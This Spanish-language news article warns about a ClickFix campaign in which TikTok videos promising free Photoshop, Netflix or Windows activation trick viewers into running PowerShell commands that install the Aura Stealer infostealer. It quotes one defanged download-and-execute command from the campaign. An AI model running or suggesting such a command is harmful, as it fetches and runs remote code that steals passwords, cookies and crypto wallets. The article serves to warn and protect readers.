Publicado: octubre 23, 2025, 1:24 pm
Las redes sociales no solo son un espacio para el entretenimiento, sino que también lo son para los ciberataques. Plataformas como TikTok, Instagram e incluso X (Twitter), son utilizadas por estos actores maliciosos para engañar a las víctimas mediante técnicas de ingeniería social y suelen aprovecharse del gran alcance que tiene, y de la confianza que muchos usuarios ponen en el contenido que se comparte.
En este contexto, se ha detectado una campaña maliciosa en TikTok que utiliza videos, aparentemente inofensivos, pero que esconden ataques para instalar malware en los dispositivos.
Desconfía de los tutoriales de TikTok que ofrecen servicios de pago gratis
Este tipo de ataque se conoce ClickFix y se basa en una serie de videos que prometen guías para acceder de forma gratuita a programas o servicios de pago como Netflix, Windows, Spotify o Photoshop. Pero al ejecutar los comandos, ya sea para esto, solucionar un problema o desbloquear una función, el usuario instalará un malware en su equipo, tal y como explican desde Bleeping Computer, donde recogen las palabras de Xavier Mertens, responsable del SANS Internet Storm Center.
Dentro de TikTok, los videos muestran líneas de comando que se tienen que ejecutar como administrador en PowerShell y un ejemplo que cita Mertens es el siguiente: ‘iex (irm slmgr[.]win/photoshop’, en el caso de un vídeo destinado a Photoshop. Este comando activa, aparentemente, el software de Adobe de forma gratuita, aunque su trabajo real es conectar con un sitio remoto que descarga y ejecuta otro script malicioso, que instala dos programas dañinos.
Uno de ellos es una variante del malware Aura Stealer, creado para robar información como contraseñas guardadas, cookies de sesión y carteras de criptomonedas. Por su parte, la finalidad exacta del segundo programa todavía no se ha determinado, pero parece que almacena código bajo demanda. Por ello, aquellos que sigan los pasos en este tipo de videos verán comprometida su privacidad y seguridad.
Lo que se recomienda ante esta situación es no fiarse de cualquier método fácil y rápido que ofrezca obtener software o servicios de pago de forma gratuita y, por su puesto, no ejecutar ningún comando y script de fuentes no oficiales.
